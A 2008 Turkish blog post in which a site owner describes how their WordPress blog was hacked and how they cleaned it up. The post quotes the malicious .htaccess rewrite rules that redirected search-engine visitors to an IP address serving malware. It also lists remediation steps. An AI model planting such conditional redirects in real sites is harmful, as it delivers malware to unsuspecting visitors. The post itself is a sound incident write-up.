Hacklendik

18 Kasım 2008

Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda http://wordpress.org/support/topic/217700 Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen yönlendirme kodu nedeni ile yaşamışım bu sorunları. Ayrıca yazılarımın için yerleştirilmiş bir iframe reklam linkeleri de var tabi. Yukarıdaki linkdeki işlemleri tek tek yaptım - htaccess dosyasını sildim. - ftp şifremi değiştirdim - hostingh firmamdan sitemin bulnduğu klasörü bir virüs, malware taramasından geçirmelerini istedim. Sorunun ana nedeni htaccess dosyasında ki kodlar olarak görünüyor. Başta uzunca bir boşluktan sonra aşağıdaki kod yazıyordu.

RewriteEngine On RewriteCond %{HTTP_REFERER} .google.$ [NC,OR] RewriteCond %{HTTP_REFERER} .aol.$ [NC,OR] RewriteCond %{HTTP_REFERER} .msn.$ [NC,OR] RewriteCond %{HTTP_REFERER} .altavista.$ [NC,OR] RewriteCond %{HTTP_REFERER} .ask.$ [NC,OR] RewriteCond %{HTTP_REFERER} .yahoo.$ [NC] RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

Bu arada cute ftp’de htaccess görüntülemeyide öğrendik. http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html Muhtemelen sorun haftasonu benim kalıcı bağlantılarım gittinde oldu ve ben bunu anlamadım. Asıl sorunun ise sitemi yahoo.com’da aradığımda karşılaştım, linke tıkladığımda bilgisayarıma zararlı yazılım eklemeye çalıştı. Zaten yukarıdaki kodda da bu açıkça görülüyor, siteme direk girişlerde değilde arama sonuçlarından gelince yüklenmeye çalışıyor. Ama hesap edemedikleri şey google’un bunu görüp sitemi kapatması. Google’un ve Firefox’un sitemi engellemeleri daha bitmedi. Google Web Yöneticis aracındaki incelemeye alın işaret kutunu işaretledim ve StopBadware.org’daki formuda doldurdum. Neyse hayırlısı bakalım. Bu durumu gören ve beni uyaran tüm arkadaşlara teşekkürler. Umarım bu tip sorunlarla bi daha karşılaşmayız.

Ek olarak

Ayrıca http://fatihhayrioglu.com/?ref=siteAdi gibi linkler var. Bunlarıda robots.txt User-agent: * Disallow: /ref= Disallow: /*?ref= kodlarını ekleyerek düzelttim. İşin ilginci bu linkleri google’un arama aracı nasıl buluyor.

Avatar Popout Efekti

Avatar Popout Efekti uygulaması Devamını oku

Kapsayıcı sorguları (container query)

29 January 2024 tarihinde yayınlandı.

Renk geçişli ve Hareketli kenar çizgileri

22 January 2024 tarihinde yayınlandı.